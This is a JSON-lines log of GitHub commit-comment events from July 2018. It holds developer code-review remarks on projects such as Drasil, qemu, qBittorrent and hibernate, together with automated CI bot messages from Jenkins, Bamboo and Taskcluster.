{"id":"7919667871","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29598462,"position":null,"line":null,"path":null,"commit_id":"338e888d4fd33d26b618895984359f3618db5c46","created_at":"2018-07-04T18:12:57Z","updated_at":"2018-07-04T18:12:57Z","author_association":"COLLABORATOR","body":"None of this code was being used. That's because Printing/Import.hs has very similar code and is enough for the document generation. (The Printing/Import.hs file was made a lot more recently as well, so assumed that this is a deprecated file)"}},"created_at":"2018-07-04T18:12:57Z"}
{"id":"7919671172","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29598472,"position":183,"line":183,"path":"lesson7/interface.rb","commit_id":"c4c0eeee5e8b8f764cf89d03750dda170bea2111","created_at":"2018-07-04T18:14:14Z","updated_at":"2018-07-04T18:14:14Z","author_association":"NONE","body":"когда \"бегин\" совпадает с началом метода, он не нужен"}},"created_at":"2018-07-04T18:14:14Z"}
{"id":"7919672404","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29598475,"position":186,"line":186,"path":"lesson7/interface.rb","commit_id":"c4c0eeee5e8b8f764cf89d03750dda170bea2111","created_at":"2018-07-04T18:14:42Z","updated_at":"2018-07-04T18:14:42Z","author_association":"NONE","body":"аналогично в остальных случаях подобного кода"}},"created_at":"2018-07-04T18:14:42Z"}
{"id":"7919672824","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29598476,"position":null,"line":null,"path":null,"commit_id":"ced0e9c3f7c881dc017d58dfdb39925285879cf8","created_at":"2018-07-04T18:14:52Z","updated_at":"2018-07-04T18:14:52Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/62/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/62//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/ced0e9c3f7c881dc017d58dfdb39925285879cf8/62/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/ced0e9c3f7c881dc017d58dfdb39925285879cf8/62/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/ced0e9c3f7c881dc017d58dfdb39925285879cf8/62/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/ced0e9c3f7c881dc017d58dfdb39925285879cf8/62/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-04T18:14:52Z"}
{"id":"7919673327","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29598479,"position":13,"line":31,"path":"code/Language/Drasil/Chunk/Eq.hs","commit_id":"b032040f259db486b4b1e988784879bb81cb9d00","created_at":"2018-07-04T18:15:04Z","updated_at":"2018-07-04T18:15:04Z","author_association":"OWNER","body":"What we need is a proper data-structure for data definitions. That can have a `notes` field. `QDefinition` is a building block for DD."}},"created_at":"2018-07-04T18:15:04Z"}
{"id":"7919674585","type":"CommitCommentEvent","actor":{"login":"treenix"},"repo":{"name":"treenix/game"},"payload":{"comment":{"id":29598483,"position":52,"line":213,"path":"voxygen/src/game.rs","commit_id":"467f1c508236a7528fa4b0b931a6470d1287280c","created_at":"2018-07-04T18:15:32Z","updated_at":"2018-07-04T18:15:32Z","author_association":"OWNER","body":"Was a mistake"}},"created_at":"2018-07-04T18:15:32Z"}
{"id":"7919675310","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29598484,"position":null,"line":null,"path":null,"commit_id":"31a7596cd3a9899d0f676405b53bbfb1c0cecb25","created_at":"2018-07-04T18:15:49Z","updated_at":"2018-07-04T18:15:49Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios-device-tests/1/display/redirect) (on internal Jenkins) failed in stage 'Publish builds to GitHub' 🔥 : hudson.AbortException: No item named ../macios-device-tests found\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios-device-tests/1//console)\n"}},"created_at":"2018-07-04T18:15:49Z"}
{"id":"7919676862","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29598488,"position":null,"line":null,"path":null,"commit_id":"31a7596cd3a9899d0f676405b53bbfb1c0cecb25","created_at":"2018-07-04T18:16:24Z","updated_at":"2018-07-04T18:16:24Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/jenkins-device-tests/1/display/redirect) (on internal Jenkins) failed in stage 'Publish builds to GitHub' 🔥 : hudson.AbortException: macios-device-tests #1 completed with status FAILURE (propagate: false to ignore)\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/jenkins-device-tests/1//console)\n"}},"created_at":"2018-07-04T18:16:24Z"}
{"id":"7919682234","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29598501,"position":167,"line":167,"path":"lesson7/interface.rb","commit_id":"c4c0eeee5e8b8f764cf89d03750dda170bea2111","created_at":"2018-07-04T18:18:17Z","updated_at":"2018-07-04T18:18:17Z","author_association":"NONE","body":"тоже не очень хорошая практика...\r\nпо сути ты здесь проводишь валидацию на уникальность аттрибута... только в замаскированном виде\r\nкак будто это не валидация...\r\nлучше либо убрать эту проверку. либо реализовать ее полноценно, но не здесь\r\nсм. подробное описание ниже )"}},"created_at":"2018-07-04T18:18:17Z"}
{"id":"7919684820","type":"CommitCommentEvent","actor":{"login":"glassez"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29598507,"position":5,"line":3464,"path":"src/gui/optionsdialog.ui","commit_id":"a92344ade4dec2ca3f71c5efba20e8a4c42fc8ab","created_at":"2018-07-04T18:19:12Z","updated_at":"2018-07-04T18:19:12Z","author_association":"MEMBER","body":"Aren't icons used in this dialog?"}},"created_at":"2018-07-04T18:19:12Z"}
{"id":"7919686013","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29598509,"position":6,"line":770,"path":"tests/Makefile.include","commit_id":"cd4581cb9c33d05457b255d7eaf73df2c823aede","created_at":"2018-07-04T18:19:38Z","updated_at":"2018-07-04T18:19:38Z","author_association":"NONE","body":"Oh I see. That is because test-qgraph.c should only link with qgraph.c, not all the rest of libqos-pc-obj-y. If you still get undefined symbols, please post the entire list. Thanks!"}},"created_at":"2018-07-04T18:19:38Z"}
{"id":"7919686820","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29598513,"position":null,"line":null,"path":null,"commit_id":"338e888d4fd33d26b618895984359f3618db5c46","created_at":"2018-07-04T18:19:58Z","updated_at":"2018-07-04T18:19:58Z","author_association":"OWNER","body":"I think I just forgot to delete this file when I merge things into `Printing.Import`.  So it should be completely deleted."}},"created_at":"2018-07-04T18:19:58Z"}
{"id":"7919687634","type":"CommitCommentEvent","actor":{"login":"karpovichDima"},"repo":{"name":"karpovichDima/FirebaseChat"},"payload":{"comment":{"id":29598517,"position":null,"line":null,"path":null,"commit_id":"ec7b09255c5c11324c1b47ccc7611e232535fafe","created_at":"2018-07-04T18:20:16Z","updated_at":"2018-07-04T18:20:16Z","author_association":"OWNER","body":"Когда-нибудь я сделаю этот чат очень функциональным, но не сегодня."}},"created_at":"2018-07-04T18:20:16Z"}
{"id":"7919689301","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598522,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-04T18:20:54Z","updated_at":"2018-07-04T18:20:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:20:54Z"}
{"id":"7919689403","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598523,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-04T18:20:56Z","updated_at":"2018-07-04T18:20:56Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:20:56Z"}
{"id":"7919689685","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598524,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-04T18:21:03Z","updated_at":"2018-07-04T18:21:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:21:03Z"}
{"id":"7919691812","type":"CommitCommentEvent","actor":{"login":"Myeongjoon"},"repo":{"name":"Myeongjoon/hash-brown"},"payload":{"comment":{"id":29598529,"position":null,"line":null,"path":null,"commit_id":"c34859f697fca6b305957710bab28bc2b6e1ba7d","created_at":"2018-07-04T18:21:50Z","updated_at":"2018-07-04T18:21:50Z","author_association":"OWNER","body":"에바임"}},"created_at":"2018-07-04T18:21:50Z"}
{"id":"7919692647","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598530,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-04T18:22:04Z","updated_at":"2018-07-04T18:22:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:22:04Z"}
{"id":"7919692753","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598532,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-04T18:22:06Z","updated_at":"2018-07-04T18:22:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:22:06Z"}
{"id":"7919693158","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598533,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-04T18:22:14Z","updated_at":"2018-07-04T18:22:14Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:22:14Z"}
{"id":"7919709131","type":"CommitCommentEvent","actor":{"login":"vladmihalcea"},"repo":{"name":"hibernate/hibernate-orm"},"payload":{"comment":{"id":29598587,"position":33,"line":163,"path":"hibernate-core/src/test/java/org/hibernate/jpa/test/lock/LockTest.java","commit_id":"6b3e4e6f56771dd2955a42a4830a44bd56899e70","created_at":"2018-07-04T18:28:25Z","updated_at":"2018-07-04T18:28:25Z","author_association":"MEMBER","body":"Fixed by [HHH-12769](https://hibernate.atlassian.net/browse/HHH-12769), so now it works properly on H2, MySQL, PostgreSQL, and Oracle."}},"created_at":"2018-07-04T18:28:25Z"}
{"id":"7919710417","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"MPOS/php-mpos"},"payload":{"comment":{"id":29598589,"position":null,"line":null,"path":null,"commit_id":"40ba37490e2412d8d2938971b2865a0c32d8dcf0","created_at":"2018-07-04T18:28:52Z","updated_at":"2018-07-04T18:28:52Z","author_association":"NONE","body":"40ba374"}},"created_at":"2018-07-04T18:28:52Z"}
{"id":"7919710783","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598590,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-04T18:29:01Z","updated_at":"2018-07-04T18:29:01Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:29:01Z"}
{"id":"7919711299","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598591,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-04T18:29:13Z","updated_at":"2018-07-04T18:29:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:29:13Z"}
{"id":"7919711363","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598592,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-04T18:29:15Z","updated_at":"2018-07-04T18:29:15Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:29:15Z"}
{"id":"7919711632","type":"CommitCommentEvent","actor":{"login":"Paul-Reed"},"repo":{"name":"emrysr/emoncms"},"payload":{"comment":{"id":29598594,"position":null,"line":null,"path":null,"commit_id":"13b3ead4f9ae0e9601175778ee31038818e13e23","created_at":"2018-07-04T18:29:21Z","updated_at":"2018-07-04T18:29:21Z","author_association":"NONE","body":"Nick O'Leary (node-red author) got around this for his [pubsubclient mqtt library](https://github.com/knolleary/pubsubclient/blob/master/examples/mqtt_esp8266/mqtt_esp8266.ino) by prefixing a random string with the client ID name, so it can easily be recognized.\r\nie `emoncmsclient-3b77e8`\r\n\r\nThe C++ code is below;\r\n\r\n```\r\n    // Create a random client ID\r\n    String clientId = \"ESP8266Client-\";\r\n    clientId += String(random(0xffff), HEX);\r\n    // Attempt to connect\r\n    if (client.connect(clientId.c_str())) {\r\n      Serial.println(\"connected\");\r\n```"}},"created_at":"2018-07-04T18:29:21Z"}
{"id":"7919713986","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598607,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-04T18:30:16Z","updated_at":"2018-07-04T18:30:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:30:16Z"}
{"id":"7919714373","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598609,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-04T18:30:25Z","updated_at":"2018-07-04T18:30:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:30:25Z"}
{"id":"7919714423","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598610,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-04T18:30:26Z","updated_at":"2018-07-04T18:30:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:30:26Z"}
{"id":"7919715050","type":"CommitCommentEvent","actor":{"login":"karpovichDima"},"repo":{"name":"karpovichDima/Beacons"},"payload":{"comment":{"id":29598611,"position":null,"line":null,"path":null,"commit_id":"8c1fa9114a4d50a3d8eaab569fe1d4dac395d13c","created_at":"2018-07-04T18:30:38Z","updated_at":"2018-07-04T18:30:38Z","author_association":"OWNER","body":"fix architecture and search method"}},"created_at":"2018-07-04T18:30:38Z"}
{"id":"7919715977","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29598612,"position":null,"line":null,"path":null,"commit_id":"f0275d184bccba43e6d80ea79a91cc393b2825c2","created_at":"2018-07-04T18:30:59Z","updated_at":"2018-07-04T18:30:59Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AnyOf\": [\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n      ]\n    },\n    {\n      \"AnyOf\": [\n        \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n        {\n          \"AllOf\": [\n            \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n            \"queue:task-group-id:taskcluster-github/f5Py8dvMSfCBZ59M1wQLIQ\",\n            \"queue:schedule-task:taskcluster-github/f5Py8dvMSfCBZ59M1wQLIQ/f5Py8dvMSfCBZ59M1wQLIQ\"\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/servo/servo:pull-request\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/servo\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:task-group-id:taskcluster-github/f5Py8dvMSfCBZ59M1wQLIQ\",\n                \"queue:schedule-task:taskcluster-github/f5Py8dvMSfCBZ59M1wQLIQ/f5Py8dvMSfCBZ59M1wQLIQ\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-04T18:30:58.928Z\n\n</details>"}},"created_at":"2018-07-04T18:30:59Z"}
{"id":"7919717209","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29598615,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-04T18:31:27Z","updated_at":"2018-07-04T18:31:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T18:31:27Z"}
